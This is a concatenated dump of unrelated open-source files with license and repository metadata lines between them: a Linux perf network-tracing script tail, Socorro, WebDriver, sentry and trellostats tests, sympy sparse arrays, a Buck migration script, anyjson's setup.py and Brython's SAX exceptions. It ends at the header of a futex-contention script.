	# if an irq doesn't include NET_RX softirq, drop.
	if 'event_list' in irq_record.keys():
		irq_dic[cpu].append(irq_record)
def handle_irq_softirq_raise(event_info):
	# A softirq was raised inside a hard-irq handler: tag the innermost
	# open irq record on this cpu with a 'sirq_raise' sub-event.
	(name, context, cpu, time, pid, comm, vec) = event_info
	if not irq_dic.get(cpu):
		return
	irq_record = irq_dic[cpu].pop()
	sub_events = irq_record.get('event_list', [])
	sub_events.append({'time':time, 'event':'sirq_raise'})
	irq_record['event_list'] = sub_events
	irq_dic[cpu].append(irq_record)
def handle_irq_softirq_entry(event_info):
	# Start collecting NET_RX work for this cpu.
	# event_info = (name, context, cpu, time, pid, comm, vec)
	cpu, time = event_info[2], event_info[3]
	net_rx_dic[cpu] = {'sirq_ent_t': time, 'event_list': []}
def handle_irq_softirq_exit(event_info):
	# A NET_RX softirq finished: merge the hard-irq records and the
	# collected sub-events into one receive hunk.
	(name, context, cpu, time, pid, comm, vec) = event_info
	irq_list = irq_dic.pop(cpu, [])
	rx_info = net_rx_dic.pop(cpu, None)
	# Nothing to report unless both an irq context and softirq data exist.
	if irq_list == [] or rx_info is None:
		return
	receive_hunk_list.append({'sirq_ent_t':rx_info['sirq_ent_t'],
				'sirq_ext_t':time,
				'irq_list':irq_list,
				'event_list':rx_info['event_list']})
def handle_napi_poll(event_info):
	# Record a napi poll as a sub-event of the in-flight NET_RX softirq.
	(name, context, cpu, time, pid, comm, napi, dev_name) = event_info
	if cpu in net_rx_dic.keys():
		net_rx_dic[cpu]['event_list'].append(
			{'event_name':'napi_poll', 'dev':dev_name, 'event_t':time})
def handle_netif_rx(event_info):
	# netif_rx inside a hard-irq handler: attach the skb as a sub-event of
	# the innermost open irq record on this cpu.
	(name, context, cpu, time, pid, comm,
		skbaddr, skblen, dev_name) = event_info
	if not irq_dic.get(cpu):
		return
	irq_record = irq_dic[cpu].pop()
	sub_events = irq_record.get('event_list', [])
	sub_events.append({'time':time, 'event':'netif_rx',
		'skbaddr':skbaddr, 'skblen':skblen, 'dev_name':dev_name})
	irq_record['event_list'] = sub_events
	irq_dic[cpu].append(irq_record)
def handle_netif_receive_skb(event_info):
	# Log the skb both as a softirq sub-event and on the bounded
	# rx_skb_list ring used to match later free/copy events.
	global of_count_rx_skb_list

	(name, context, cpu, time, pid, comm,
		skbaddr, skblen, dev_name) = event_info
	if cpu not in net_rx_dic.keys():
		return
	rec_data = {'event_name':'netif_receive_skb',
		'event_t':time, 'skbaddr':skbaddr, 'len':skblen}
	net_rx_dic[cpu]['event_list'].append(rec_data)
	rx_skb_list.insert(0, rec_data)
	if len(rx_skb_list) > buffer_budget:
		rx_skb_list.pop()
		of_count_rx_skb_list += 1
def handle_net_dev_queue(event_info):
	# Remember when an skb was queued for transmit, on a bounded ring.
	global of_count_tx_queue_list

	(name, context, cpu, time, pid, comm,
		skbaddr, skblen, dev_name) = event_info
	tx_queue_list.insert(0,
		{'dev':dev_name, 'skbaddr':skbaddr, 'len':skblen, 'queue_t':time})
	if len(tx_queue_list) > buffer_budget:
		tx_queue_list.pop()
		of_count_tx_queue_list += 1
def handle_net_dev_xmit(event_info):
	# Successful transmit: move the queued skb record to tx_xmit_list,
	# stamping the xmit time.
	global of_count_tx_xmit_list

	(name, context, cpu, time, pid, comm,
		skbaddr, skblen, rc, dev_name) = event_info
	if rc != 0: # anything but NETDEV_TX_OK
		return
	for i, skb in enumerate(tx_queue_list):
		if skb['skbaddr'] != skbaddr:
			continue
		skb['xmit_t'] = time
		tx_xmit_list.insert(0, skb)
		del tx_queue_list[i]
		if len(tx_xmit_list) > buffer_budget:
			tx_xmit_list.pop()
			of_count_tx_xmit_list += 1
		return
def handle_kfree_skb(event_info):
	# An skb was dropped: reconcile it with whichever tracking list
	# (tx queue, tx xmit, rx) it is currently on; first match wins.
	(name, context, cpu, time, pid, comm,
		skbaddr, protocol, location) = event_info
	for i, skb in enumerate(tx_queue_list):
		if skb['skbaddr'] == skbaddr:
			# Freed before it was ever transmitted.
			del tx_queue_list[i]
			return
	for i, skb in enumerate(tx_xmit_list):
		if skb['skbaddr'] == skbaddr:
			skb['free_t'] = time
			tx_free_list.append(skb)
			del tx_xmit_list[i]
			return
	for i, rec_data in enumerate(rx_skb_list):
		if rec_data['skbaddr'] == skbaddr:
			rec_data.update({'handle':"kfree_skb",
				'comm':comm, 'pid':pid, 'comm_t':time})
			del rx_skb_list[i]
			return
def handle_consume_skb(event_info):
	# Normal completion of a transmitted skb: stamp the free time and
	# move its record to tx_free_list.
	(name, context, cpu, time, pid, comm, skbaddr) = event_info
	for i, skb in enumerate(tx_xmit_list):
		if skb['skbaddr'] == skbaddr:
			skb['free_t'] = time
			tx_free_list.append(skb)
			del tx_xmit_list[i]
			return
def handle_skb_copy_datagram_iovec(event_info):
	# Data was copied to user space: the receive path for this skb is
	# complete, so finalize and drop its rx record.
	(name, context, cpu, time, pid, comm, skbaddr, skblen) = event_info
	for i, rec_data in enumerate(rx_skb_list):
		if rec_data['skbaddr'] == skbaddr:
			rec_data.update({'handle':"skb_copy_datagram_iovec",
				'comm':comm, 'pid':pid, 'comm_t':time})
			del rx_skb_list[i]
			return
| gpl-2.0 |
twobraids/socorro | webapp-django/crashstats/manage/tests/test_utils.py | 14 | 4695 | import os
from unittest import TestCase
from nose.tools import eq_
from crashstats.manage import utils
SAMPLE_CSV_FILE_PCI_DATABASE_COM = os.path.join(
os.path.dirname(__file__),
'sample-graphics.csv'
)
SAMPLE_CSV_FILE_PCI_IDS = os.path.join(
os.path.dirname(__file__),
'sample-pci.ids'
)
class TestUtils(TestCase):
    """Tests for the graphics-device parsers in crashstats.manage.utils.

    The expected dictionaries below mirror the bundled fixture files
    sample-graphics.csv (pcidatabase.com format) and sample-pci.ids
    (pci.ids format); change those files and these assertions together.
    """

    def test_string_hex_to_hex_string(self):
        # Values are normalized to lowercase, 0x-prefixed, zero-padded hex.
        func = utils.string_hex_to_hex_string
        eq_(func('919A'), '0x919a')
        eq_(func('0x919A'), '0x919a')
        eq_(func('221'), '0x0221')
        eq_(func('0221'), '0x0221')
        eq_(func('0x0221'), '0x0221')

    def test_parse_graphics_devices_iterable__pcidatabase(self):
        with open(SAMPLE_CSV_FILE_PCI_DATABASE_COM) as iterable:
            things = []
            function = utils.pcidatabase__parse_graphics_devices_iterable
            for thing in function(iterable):
                things.append(thing)
            # to be able to make these assertions you really need to
            # be familiar with the file sample-graphics.csv
            # basic test
            eq_(
                things[0],
                {
                    'adapter_hex': '0x002f',
                    'adapter_name': '.43 ieee 1394 controller',
                    'vendor_hex': '0x0033',
                    'vendor_name': 'Paradyne Corp.'
                }
            )
            # same vendor as before
            eq_(
                things[1],
                {
                    'adapter_hex': '0x0333',
                    'adapter_name': '1ACPI\\GenuineIntel_-_x86_Family_6_Model_'
                                    '23\\_0 1ACPI\\GenuineIntel_-_x86_Family_6'
                                    '_Model_23\\_0',
                    'vendor_hex': '0x0033',
                    'vendor_name': 'Paradyne Corp.'
                }
            )
            # non-utf-8 encoded charater here
            eq_(
                things[2],
                {
                    'adapter_hex': '0x08b2',
                    'adapter_name': u'123abc logitech QuickCam\ufffd Pro 4000',
                    'vendor_hex': '0x0033',
                    'vendor_name': 'Paradyne Corp.'
                }
            )
            # two adapter_hexes split up
            eq_(
                things[3],
                {
                    'adapter_hex': '0x0200',
                    'adapter_name': 'DS38xx Oregon Scientific',
                    'vendor_hex': '0x0553',
                    'vendor_name': 'Aiptek USA'
                }
            )
            eq_(
                things[4],
                {
                    'adapter_hex': '0x0201',
                    'adapter_name': 'DS38xx Oregon Scientific',
                    'vendor_hex': '0x0553',
                    'vendor_name': 'Aiptek USA'
                }
            )
            # the adapter_hex has a _ removed
            eq_(
                things[5],
                {
                    'adapter_hex': '0x6128',
                    'adapter_name': 'USB\\VID_0C45&PID_6148&REV_0101 USB PC '
                                    'Camera Plus',
                    'vendor_hex': '0x0553',
                    'vendor_name': 'Aiptek USA'
                }
            )
            eq_(
                things[6],
                {
                    'adapter_hex': '0x0221',
                    'adapter_name': 'LavaPort Quad-650 PCI C/D',
                    'vendor_hex': '0x0407',
                    'vendor_name': 'Lava Computer MFG Inc.'
                }
            )
            # Exactly the seven devices above must be yielded.
            eq_(len(things), 7)

    def test_parse_graphics_devices_iterable__pci_ids(self):
        with open(SAMPLE_CSV_FILE_PCI_IDS) as iterable:
            things = []
            function = utils.pci_ids__parse_graphics_devices_iterable
            for thing in function(iterable):
                things.append(thing)
            # to be able to make these assertions you really need to
            # be familiar with the file sample-graphics.csv
            # basic test
            eq_(
                things[0],
                {
                    'adapter_hex': '0x8139',
                    'adapter_name': 'AT-2500TX V3 Ethernet',
                    'vendor_hex': '0x0010',
                    'vendor_name': 'Allied Telesis, Inc'
                }
            )
            eq_(
                things[1],
                {
                    'adapter_hex': '0x0001',
                    'adapter_name': 'PCAN-PCI CAN-Bus controller',
                    'vendor_hex': '0x001c',
                    'vendor_name': 'PEAK-System Technik GmbH'
                }
            )
            eq_(len(things), 6)
| mpl-2.0 |
larsbergstrom/servo | tests/wpt/web-platform-tests/webdriver/tests/get_element_property/get.py | 16 | 3380 | import pytest
from tests.support.asserts import assert_error, assert_success
from tests.support.inline import inline
def get_element_property(session, element_id, prop):
    """Issue the WebDriver "Get Element Property" command over the wire."""
    uri = "session/{session_id}/element/{element_id}/property/{prop}".format(
        session_id=session.session_id,
        element_id=element_id,
        prop=prop)
    return session.transport.send("GET", uri)
def test_no_browsing_context(session, closed_window):
    # Any element command against a closed window must error out.
    response = get_element_property(session, "foo", "id")
    assert_error(response, "no such window")
def test_element_not_found(session):
    # An unknown element id yields "no such element".
    response = get_element_property(session, "foo", "id")
    assert_error(response, "no such element")
def test_element_stale(session):
    # Refreshing the page invalidates previously obtained element refs.
    session.url = inline("<input id=foobar>")
    element = session.find.css("input", all=False)
    session.refresh()
    response = get_element_property(session, element.id, "id")
    assert_error(response, "stale element reference")
def test_property_non_existent(session):
    # A missing property reads as None (JSON null), matching script access.
    session.url = inline("<input>")
    element = session.find.css("input", all=False)
    response = get_element_property(session, element.id, "foo")
    assert_success(response, None)
    assert session.execute_script("return arguments[0].foo", args=(element,)) is None
def test_content_attribute(session):
    # Initially the value property reflects the content attribute.
    session.url = inline("<input value=foobar>")
    element = session.find.css("input", all=False)
    response = get_element_property(session, element.id, "value")
    assert_success(response, "foobar")
def test_idl_attribute(session):
    # After a script write, Get Element Property must return the live IDL
    # attribute, not the original content attribute.
    session.url = inline("<input value=foo>")
    element = session.find.css("input", all=False)
    session.execute_script("""arguments[0].value = "bar";""", args=(element,))
    response = get_element_property(session, element.id, "value")
    assert_success(response, "bar")
@pytest.mark.parametrize("js_primitive,py_primitive", [
    ("\"foobar\"", "foobar"),
    (42, 42),
    ([], []),
    ({}, {}),
    ("null", None),
    ("undefined", None),
])
def test_primitives(session, js_primitive, py_primitive):
    # JS primitives set on the element must round-trip to the equivalent
    # Python value; note null and undefined both map to None.
    session.url = inline("""
        <input>
        <script>
        const input = document.querySelector("input");
        input.foobar = {js_primitive};
        </script>
        """.format(js_primitive=js_primitive))
    element = session.find.css("input", all=False)
    response = get_element_property(session, element.id, "foobar")
    assert_success(response, py_primitive)
@pytest.mark.parametrize("js_primitive,py_primitive", [
    ("\"foobar\"", "foobar"),
    (42, 42),
    ([], []),
    ({}, {}),
    ("null", None),
    ("undefined", None),
])
def test_primitives_set_by_execute_script(session, js_primitive, py_primitive):
    # Same round-trip as test_primitives, but the property is written via
    # Execute Script instead of inline page markup.
    session.url = inline("<input>")
    element = session.find.css("input", all=False)
    session.execute_script("arguments[0].foobar = {}".format(js_primitive), args=(element,))
    response = get_element_property(session, element.id, "foobar")
    assert_success(response, py_primitive)
def test_mutated_element(session):
    # Clicking toggles the checked IDL attribute without adding a content
    # attribute; the property read must observe the live IDL value.
    session.url = inline("<input type=checkbox>")
    element = session.find.css("input", all=False)
    element.click()
    assert session.execute_script("return arguments[0].hasAttribute('checked')", args=(element,)) is False
    response = get_element_property(session, element.id, "checked")
    assert_success(response, True)
| mpl-2.0 |
rahuldan/sympy | sympy/tensor/array/sparse_ndim_array.py | 20 | 5831 | from __future__ import print_function, division
import functools
import itertools
from sympy.core.sympify import _sympify
from sympy import S, Dict, flatten, SparseMatrix, Basic, Tuple
from sympy.tensor.array.mutable_ndim_array import MutableNDimArray
from sympy.tensor.array.ndim_array import NDimArray, ImmutableNDimArray
class SparseNDimArray(NDimArray):
    """Base class for sparse N-dim arrays.

    Non-zero elements are stored in ``self._sparse_array``, a mapping from
    the flattened (row-major) index to the value; indices absent from the
    mapping read as zero.
    """

    def __new__(self, *args, **kwargs):
        # Instantiating the abstract base produces the immutable variant.
        return ImmutableSparseNDimArray(*args, **kwargs)

    def __getitem__(self, index):
        """
        Get an element from a sparse N-dim array.

        Examples
        ========

        >>> from sympy.tensor.array import MutableSparseNDimArray
        >>> a = MutableSparseNDimArray(range(4), (2, 2))
        >>> a
        [[0, 1], [2, 3]]
        >>> a[0, 0]
        0
        >>> a[1, 1]
        3
        >>> a[0]
        0
        >>> a[2]
        2

        """
        # `index` is a tuple with one or more slices:
        if isinstance(index, tuple) and any([isinstance(i, slice) for i in index]):

            def slice_expand(s, dim):
                # Expand a slice into the explicit list of indices it
                # selects along an axis of size `dim`; a plain integer
                # becomes a one-element tuple.
                if not isinstance(s, slice):
                    return (s,)
                start, stop, step = s.indices(dim)
                return [start + i*step for i in range((stop-start)//step)]

            sl_factors = [slice_expand(i, dim) for (i, dim) in zip(index, self.shape)]
            eindices = itertools.product(*sl_factors)
            array = [self._sparse_array.get(self._parse_index(i), S.Zero) for i in eindices]
            # Only the sliced axes survive in the result's shape.
            nshape = [len(el) for i, el in enumerate(sl_factors) if isinstance(index[i], slice)]
            return type(self)(array, nshape)
        else:
            # `index` is a single slice:
            if isinstance(index, slice):
                start, stop, step = index.indices(self._loop_size)
                retvec = [self._sparse_array.get(ind, S.Zero) for ind in range(start, stop, step)]
                return retvec
            # `index` is a number or a tuple without any slice:
            else:
                index = self._parse_index(index)
                return self._sparse_array.get(index, S.Zero)

    @classmethod
    def zeros(cls, *shape):
        """
        Return a sparse N-dim array of zeros.
        """
        return cls({}, shape)

    def tomatrix(self):
        """
        Converts this array to a SparseMatrix. Can convert only 2-dim array, else will raise error.

        Examples
        ========

        >>> from sympy.tensor.array import MutableSparseNDimArray
        >>> a = MutableSparseNDimArray([1 for i in range(9)], (3, 3))
        >>> b = a.tomatrix()
        >>> b
        Matrix([
        [1, 1, 1],
        [1, 1, 1],
        [1, 1, 1]])
        """
        if self.rank() != 2:
            raise ValueError('Dimensions must be of size of 2')

        mat_sparse = {}
        for key, value in self._sparse_array.items():
            mat_sparse[self._get_tuple_index(key)] = value

        return SparseMatrix(self.shape[0], self.shape[1], mat_sparse)

    def __iter__(self):
        # Iterate over the flattened array, materializing zeros on the fly.
        def iterator():
            for i in range(self._loop_size):
                yield self[i]
        return iterator()

    def reshape(self, *newshape):
        """Return an array with the same flat data and the given shape.

        The total number of elements must be unchanged.

        Bug fixes: the error path used ``"..." + newshape`` (str + tuple
        raises TypeError instead of ValueError), and the return statement
        referenced ``self._array`` — which sparse arrays do not have — with
        the constructor arguments in the wrong order.
        """
        new_total_size = functools.reduce(lambda x, y: x*y, newshape)
        if new_total_size != self._loop_size:
            raise ValueError("Invalid reshape parameters " + str(newshape))

        # Flat indices are row-major, so the sparse mapping stays valid for
        # any shape with the same total size.
        return type(self)(self._sparse_array, newshape)
class ImmutableSparseNDimArray(SparseNDimArray, ImmutableNDimArray):
    # Immutable variant: storage is a sympy Dict and the instance is built
    # through Basic.__new__ so it participates in the sympy expression tree.

    def __new__(cls, *args, **kwargs):
        shape, flat_list = cls._handle_ndarray_creation_inputs(*args, **kwargs)
        shape = Tuple(*map(_sympify, shape))
        loop_size = functools.reduce(lambda x,y: x*y, shape) if shape else 0

        # Sparse array:
        if isinstance(flat_list, (dict, Dict)):
            sparse_array = Dict(flat_list)
        else:
            sparse_array = {}
            # Only non-zero entries are stored, keyed by flat index.
            for i, el in enumerate(flatten(flat_list)):
                if el != 0:
                    sparse_array[i] = _sympify(el)
            sparse_array = Dict(sparse_array)

        self = Basic.__new__(cls, sparse_array, shape, **kwargs)
        self._shape = shape
        self._rank = len(shape)
        self._loop_size = loop_size
        self._sparse_array = sparse_array

        return self

    def __setitem__(self, index, value):
        # Immutable arrays reject all item assignment.
        raise TypeError("immutable N-dim array")
class MutableSparseNDimArray(MutableNDimArray, SparseNDimArray):
    """Mutable sparse N-dim array backed by a plain dict of flat indices."""

    def __new__(cls, *args, **kwargs):
        shape, flat_list = cls._handle_ndarray_creation_inputs(*args, **kwargs)
        self = object.__new__(cls)
        self._shape = shape
        self._rank = len(shape)
        self._loop_size = functools.reduce(lambda x, y: x*y, shape) if shape else 0

        # Sparse array: accept either an already-sparse mapping or any
        # (possibly nested) iterable, keeping only non-zero entries.
        if isinstance(flat_list, (dict, Dict)):
            self._sparse_array = dict(flat_list)
            return self

        self._sparse_array = {}

        for i, el in enumerate(flatten(flat_list)):
            if el != 0:
                self._sparse_array[i] = _sympify(el)

        return self

    def __setitem__(self, index, value):
        """Allows to set items to MutableSparseNDimArray.

        Examples
        ========

        >>> from sympy.tensor.array import MutableSparseNDimArray
        >>> a = MutableSparseNDimArray.zeros(2, 2)
        >>> a[0, 0] = 1
        >>> a[1, 1] = 1
        >>> a
        [[1, 0], [0, 1]]
        """
        index = self._parse_index(index)
        if not isinstance(value, MutableNDimArray):
            value = _sympify(value)

        if isinstance(value, NDimArray):
            # Bug fix: this previously *returned* NotImplementedError, which
            # __setitem__ callers discard, silently dropping the assignment.
            raise NotImplementedError(
                "assigning an NDimArray to a single entry is not supported")

        # Keep the storage sparse: writing a zero removes the key.
        if value == 0 and index in self._sparse_array:
            self._sparse_array.pop(index)
        else:
            self._sparse_array[index] = value
| bsd-3-clause |
romanoid/buck | scripts/migrations/dump.py | 4 | 5568 | #!/usr/bin/env python3
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import argparse
import json
import logging
import os
from typing import List
import build_file
import label
import repository
class StoreKeyValuePair(argparse.Action):
    """
    Parser action that accumulates repeated ``KEY=VALUE`` options into a
    single dictionary stored on the namespace under ``dest``.
    """

    def __call__(self, parser, namespace, values, option_string=None):
        key, value = values.split("=")
        # Reuse the dict accumulated by earlier occurrences, if any.
        pairs = getattr(namespace, self.dest, None) or {}
        pairs[key] = value
        setattr(namespace, self.dest, pairs)
def dump_exported_symbols(args):
    """Print all symbols exported using include_defs in a build file."""
    logging.debug("Dumping exported symbols for " + args.build_file)
    repo = repository.Repository(args.repository, args.cell_roots)
    bf = build_file.from_path(args.build_file)
    symbols = bf.get_exported_symbols_transitive_closure(repo)
    # One symbol per line for humans, a JSON array for machines.
    print(json.dumps(symbols) if args.json else os.linesep.join(symbols))
def dump_export_map(args):
    """
    Prints export map that includes all included definitions and symbols they
    export.
    """
    logging.debug("Dumping export map for " + args.build_file)
    bf = build_file.from_path(args.build_file)
    repo = repository.Repository(args.repository, args.cell_roots)
    export_map = bf.get_export_map(repo)

    # Convert an include_defs-style label into the "cell//pkg:file" string
    # used by load().
    def to_load_import_string(import_label: label):
        pkg = import_label.package
        # include_defs package includes a file name, so we have to split it
        # into file name
        file_name = pkg.split("/")[-1]
        # and it's prefix - which is the new package
        pkg = "/".join(pkg.split("/")[:-1])
        load_fn_cell = args.cell_prefix + import_label.cell if import_label.cell else ""
        return load_fn_cell + "//" + pkg + ":" + file_name
    if args.use_load_function_import_string_format:
        # Re-key the map by load()-style import strings.
        new_export_map = {}
        for import_string, exported_symbols in export_map.items():
            new_export_map[
                to_load_import_string(label.from_string(import_string))
            ] = exported_symbols
        export_map = new_export_map
    if args.print_as_load_functions:
        # Render each entry as a complete load("...", "sym", ...) call.
        def to_load_function(import_label: label, symbols: List[str]):
            import_string = to_load_import_string(import_label)
            function_args = map(lambda s: '"%s"' % s, symbols)
            return 'load("%s", %s)' % (import_string, ",".join(function_args))
        load_functions = []
        for import_string, exported_symbols in export_map.items():
            load_functions.append(
                to_load_function(label.from_string(import_string), exported_symbols)
            )
        if args.json:
            print(json.dumps(load_functions))
        else:
            print(os.linesep.join(load_functions))
    elif args.json:
        print(json.dumps(export_map))
    else:
        # Default human-readable listing: import string, then its symbols
        # indented beneath it.
        for import_string, exported_symbols in export_map.items():
            print(import_string + ":")
            for exported_symbol in exported_symbols:
                print(" " * 2 + exported_symbol)
def main():
    """Build the CLI, configure logging, and dispatch to the dump_* handler
    selected by the sub-command (exported_symbols or export_map)."""
    parser = argparse.ArgumentParser(
        description="Dumps requested build file information."
    )
    subparsers = parser.add_subparsers()
    exported_symbols_parser = subparsers.add_parser("exported_symbols")
    exported_symbols_parser.set_defaults(func=dump_exported_symbols)
    export_map_parser = subparsers.add_parser("export_map")
    export_map_parser.add_argument(
        "--print_as_load_functions",
        action="store_true",
        help="Print export map as a series of load functions which import all "
        "symbols exported by respective imported files.",
    )
    export_map_parser.add_argument(
        "--cell_prefix",
        default="",
        help="The prefix to use for cells in import strings.",
    )
    export_map_parser.add_argument(
        "--use_load_function_import_string_format",
        action="store_true",
        help="Use load function import string syntax instead of include_defs.",
    )
    export_map_parser.set_defaults(func=dump_export_map)
    # Arguments shared by both sub-commands.
    parser.add_argument("build_file", metavar="FILE")
    parser.add_argument("--json", action="store_true")
    parser.add_argument(
        "--cell_root", action=StoreKeyValuePair, metavar="CELL=PATH", dest="cell_roots"
    )
    parser.add_argument(
        "--repository", metavar="PATH", help="Path to the repository managed by Buck."
    )
    parser.add_argument(
        "-v", "--verbose", action="store_true", help="Enabled verbose diagnostic."
    )
    args = parser.parse_args()
    logging_level = logging.DEBUG if args.verbose else logging.INFO
    logging.basicConfig(
        level=logging_level,
        format=("%(asctime)s [%(levelname)s][%(filename)s:%(lineno)d] %(message)s"),
    )
    # Dispatch to the handler registered via set_defaults(func=...).
    args.func(args)
| apache-2.0 |
ActionAgile/trellostats | tests/test_cli.py | 1 | 1063 | import os
import pytest
import shortuuid
from mock import Mock, MagicMock, patch
import click
from click.testing import CliRunner
import trellostats
from trellostats.cli import cli, token, resetdb, snapshot
from trellostats.trellostats import TrelloStatsException
from trellostats.settings import BOARD_URL, LIST_URL, ACTION_URL, TOKEN_URL
app_key = os.environ.get('TRELLOSTATS_APP_KEY')
app_token = os.environ.get('TRELLOSTATS_APP_TOKEN')
def test_cli_ctx_init():
    # Invoking the CLI group with no sub-command should print the usage
    # text and exit cleanly.
    runner = CliRunner()
    result = runner.invoke(cli)
    assert result.exit_code == 0
    assert result.output.startswith("Usage")
@patch('trellostats.cli.Snapshot')
def test_reset_db(mock_snapshot):
    """resetdb must ask for confirmation, then drop the snapshot table."""
    runner = CliRunner()
    result = runner.invoke(resetdb, input="y")
    assert result.output.startswith("Are you sure")
    assert mock_snapshot.drop_table.called
    # Bug fix: the old `assert mock...called_once_with(...)` was a no-op --
    # attribute access on a Mock auto-creates a truthy child Mock, so that
    # assertion could never fail.  Use the real assertion helper instead.
    mock_snapshot.drop_table.assert_called_once_with(fail_silently=True)
@patch('trellostats.cli.TrelloStats')
def test_token(mock_ts):
    # The token command should construct a TrelloStats client and exit 0.
    runner = CliRunner()
    result = runner.invoke(token)
    assert result.exit_code == 0
    assert mock_ts.called
| bsd-3-clause |
eeshangarg/oh-mainline | vendor/packages/anyjson/setup.py | 17 | 1349 | import sys
extra = {}
# Under Python 3, let the build run 2to3 over the (Python 2) sources.
if sys.version_info >= (3, 0):
    extra.update(use_2to3=True)

try:
    from setuptools import setup, find_packages
except ImportError:
    # setuptools unavailable: fall back to plain distutils.
    from distutils.core import setup, find_packages

# Package metadata.
author = "Rune Halvorsen"
email = "runefh@gmail.com"
version = "0.3.1"
desc = """Wraps the best available JSON implementation available in a common interface"""

setup(name='anyjson',
      version=version,
      description=desc,
      long_description=open("README").read(),
      classifiers=[
        'License :: OSI Approved :: BSD License',
        'Intended Audience :: Developers',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.4',
        'Programming Language :: Python :: 2.5',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.1',
                   ],
      keywords='json',
      author=author,
      author_email=email,
      url='http://bitbucket.org/runeh/anyjson',
      license='BSD',
      packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
      zip_safe=False,
      platforms=["any"],
      test_suite = 'nose.collector',
      **extra
      )
| agpl-3.0 |
mm112287/2015cda-24 | static/Brython3.1.0-20150301-090019/Lib/xml/sax/_exceptions.py | 625 | 4885 | """Different kinds of SAX Exceptions"""
#in brython the 4 lines below causes an $globals['Exception'] error
#import sys
#if sys.platform[:4] == "java":
# from java.lang import Exception
#del sys
# ===== SAXEXCEPTION =====
class SAXException(Exception):
    """Base class for SAX errors and warnings.

    Carries a human-readable message and, optionally, the original
    exception that triggered it.  Handlers in the ErrorHandler interface
    receive instances of this class but are not required to raise them;
    they may simply inspect the contained information.  Subclass it to add
    functionality or localization.
    """

    def __init__(self, msg, exception=None):
        """Store the required message and the optional wrapped exception."""
        self._msg = msg
        self._exception = exception
        Exception.__init__(self, msg)

    def getMessage(self):
        "Return a message for this exception."
        return self._msg

    def getException(self):
        "Return the embedded exception, or None if there was none."
        return self._exception

    def __getitem__(self, ix):
        """Reject indexing so a mistaken exception[ix] fails loudly instead
        of producing a confusing result."""
        raise AttributeError("__getitem__")

    def __str__(self):
        "Create a string representation of the exception."
        return self._msg
# ===== SAXPARSEEXCEPTION =====
class SAXParseException(SAXException):
    """An XML parse error or warning carrying location information.

    Besides the message and optional wrapped exception inherited from
    SAXException, instances record where in the source document the
    problem occurred.  Applications receiving one of these may inspect it
    and act instead of raising it.
    """

    def __init__(self, msg, exception, locator):
        "Creates the exception. The exception parameter is allowed to be None."
        SAXException.__init__(self, msg, exception)
        self._locator = locator

        # Snapshot the location immediately: by the time this exception is
        # caught, the parser objects behind the locator may already have
        # been torn down.
        self._systemId = self._locator.getSystemId()
        self._colnum = self._locator.getColumnNumber()
        self._linenum = self._locator.getLineNumber()

    def getPublicId(self):
        "Get the public identifier of the entity where the exception occurred."
        return self._locator.getPublicId()

    def getSystemId(self):
        "Get the system identifier of the entity where the exception occurred."
        return self._systemId

    def getLineNumber(self):
        "The line number of the end of the text where the exception occurred."
        return self._linenum

    def getColumnNumber(self):
        """The column number of the end of the text where the exception
        occurred."""
        return self._colnum

    def __str__(self):
        "Create a string representation of the exception."
        sysid = self.getSystemId()
        if sysid is None:
            sysid = "<unknown>"
        linenum = self.getLineNumber()
        if linenum is None:
            linenum = "?"
        colnum = self.getColumnNumber()
        if colnum is None:
            colnum = "?"
        return "%s:%s:%s: %s" % (sysid, linenum, colnum, self._msg)
# ===== SAXNOTRECOGNIZEDEXCEPTION =====
class SAXNotRecognizedException(SAXException):
    """Exception class for an unrecognized identifier.

    An XMLReader will raise this exception when it is confronted with an
    unrecognized feature or property. SAX applications and extensions may
    use this class for similar purposes."""
    # Behavior is fully inherited; the subclass exists only to give
    # callers a distinct type to catch.
    pass

# ===== SAXNOTSUPPORTEDEXCEPTION =====
class SAXNotSupportedException(SAXException):
    """Exception class for an unsupported operation.

    An XMLReader will raise this exception when a service it cannot
    perform is requested (specifically setting a state or value). SAX
    applications and extensions may use this class for similar
    purposes."""
    pass

# ===== SAXNOTSUPPORTEDEXCEPTION =====
# NOTE(review): the banner above repeats the previous section name; the
# class below is SAXReaderNotAvailable.
class SAXReaderNotAvailable(SAXNotSupportedException):
    """Exception class for a missing driver.

    An XMLReader module (driver) should raise this exception when it
    is first imported, e.g. when a support module cannot be imported.
    It also may be raised during parsing, e.g. if executing an external
    program is not permitted."""
    pass
| gpl-3.0 |
mitsuhiko/sentry | tests/sentry/db/models/test_utils.py | 9 | 1253 | from __future__ import absolute_import
from sentry.testutils import TestCase
from sentry.db.models.utils import slugify_instance
from sentry.models import Organization
class SlugifyInstanceTest(TestCase):
    """Tests for slugify_instance: verbatim use, conflict suffixing,
    reserved names, and max_length clamping."""

    def test_no_conflict(self):
        # With no existing row, the requested slug is used verbatim.
        org = Organization(name='matt')
        slugify_instance(org, 'matt')
        assert org.slug == 'matt'
        assert not Organization.objects.filter(slug='matt').exists()

    def test_conflict(self):
        # An already-taken slug forces a '<base>-<suffix>' variant.
        base_slug = self.organization.slug
        org = Organization(name='foo')
        slugify_instance(org, base_slug)
        assert org.slug.startswith(base_slug + '-'), org.slug
        assert not Organization.objects.filter(slug=org.slug).exists()

    def test_reserved(self):
        # A reserved base must not be used even as a prefix.
        base_slug = self.organization.slug
        org = Organization(name='foo')
        slugify_instance(org, base_slug, reserved=(base_slug,))
        assert not org.slug.startswith(base_slug + '-'), org.slug
        assert not Organization.objects.filter(slug=org.slug).exists()

    def test_max_length(self):
        # max_length truncates the generated slug.
        org = Organization(name='matt')
        slugify_instance(org, 'matt', max_length=2)
        assert org.slug == 'ma', org.slug
        assert not Organization.objects.filter(slug='ma').exists()
| bsd-3-clause |
Herna1994/android_kernel_cyanogen_msm8916 | tools/perf/scripts/python/futex-contention.py | 11261 | 1486 | # futex contention
# (c) 2010, Arnaldo Carvalho de Melo <acme@redhat.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Translation of:
#
